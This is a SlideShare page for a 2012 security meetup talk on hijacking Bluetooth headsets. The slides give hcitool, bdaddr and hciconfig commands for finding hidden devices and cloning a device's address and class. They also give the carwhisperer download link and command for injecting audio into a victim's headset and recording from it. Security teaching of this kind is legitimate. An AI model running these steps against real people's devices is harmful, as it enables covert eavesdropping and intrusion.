Hijacking bluetooth headsets

7,168 views
6,797 views

Published on

null Pune Chapter - November 2012 Meet

Published in: Education
1 Comment
4 Likes
Statistics
Notes
No Downloads
Views
Total views
7,168
On SlideShare
0
From Embeds
0
Number of Embeds
457
Actions
Shares
0
Downloads
111
Comments
1
Likes
4
Embeds 0
No embeds

No notes for slide

Hijacking bluetooth headsets

  1. 1. BySwaroop YermalkaR
  2. 2. 1. Finding Visible & InvisibleBluetooth Devices along with their specifications 2. Cloning Bluetooth Devices 3. Remotely Inject audio in Bluetooth headsets and record audio from it.
  3. 3. BT5 r3 laptop Nokia Bluetooth Bluetooth Dongle Galaxy Headset pop
  4. 4. 79 channels 2.4-GHz ISM bandDevices hop across these channels at a rate of 1600 times per secondBluetooth Device Address (BD_ADDR)
  5. 5. Source: www.techtree.com
  6. 6. Initial Setup
  7. 7. 1. Everything is in visible Android Settings Ubuntu Settings
  8. 8. Find a target First#hcitool scan #hcitool inq
  9. 9. btscanner
  10. 10. Bluemaho
  11. 11. 2. Let’s Find the Invisible Devices… Source: http://hwaddress.com/
  12. 12. Let’s Find the Invisible Devices…
  13. 13. Android Settings
  14. 14. Start sniffing Sniff on mon0
  15. 15. SAMSUNG
  16. 16. It is Samsung device
  17. 17. We have: 00:07:AB:ff:CF:88~MAC address plus one ~ MAC address minus 1 ~MAC address minus one FOUND!!!
  18. 18. #hcitool inq <bd_addr>
  19. 19. Enumerate the services for further attack
  20. 20. Recall PreviousInformation…
  21. 21. #hcitool scan#bdaddr -i hci1 <new_bd_addr>
  22. 22. #hciconfig hci1 name “android” #hciconfig hci0 class 0x58020c
  23. 23. Observe the Fields
  24. 24. Laptop
  25. 25. Why to Clone the bluetooth device?In certain premises, some bluetooth type device may berestricted. Does it still bother you? For many attacks such as attacks on bluetooth headset it isnecessary to make our device headset compatible.
  26. 26. Is our bluetooth dongle headset compatible?No? change itsclass.
  27. 27. Device conforms to the Headset Profile
  28. 28. Find your victim
  29. 29. Download url:http://trifinite.org/Downloads/carwhisperer-0.2.tar.gz
  30. 30. #./carwhisperer <interface> <injecting audio file> <Outputfile> <victim BD_ADDR>
  31. 31. Built on AIRcable XR™ long-rangetechnology1 km external antenna includedExtended range for up to 30 km***No external power neededAluminum case for reduced interferenceand increased sensitivity
  32. 32. 1. Bluetooth Hacking: The state of art by trifinite.org 2. Bluetooth WikiYi-Bing Lin
  33. 33. Oct-2012 Sep-2012 Nov-2012 www.chmag.in
  34. 34. Feedback, questions and suggestions:swaroop.wireless@gmail.com

×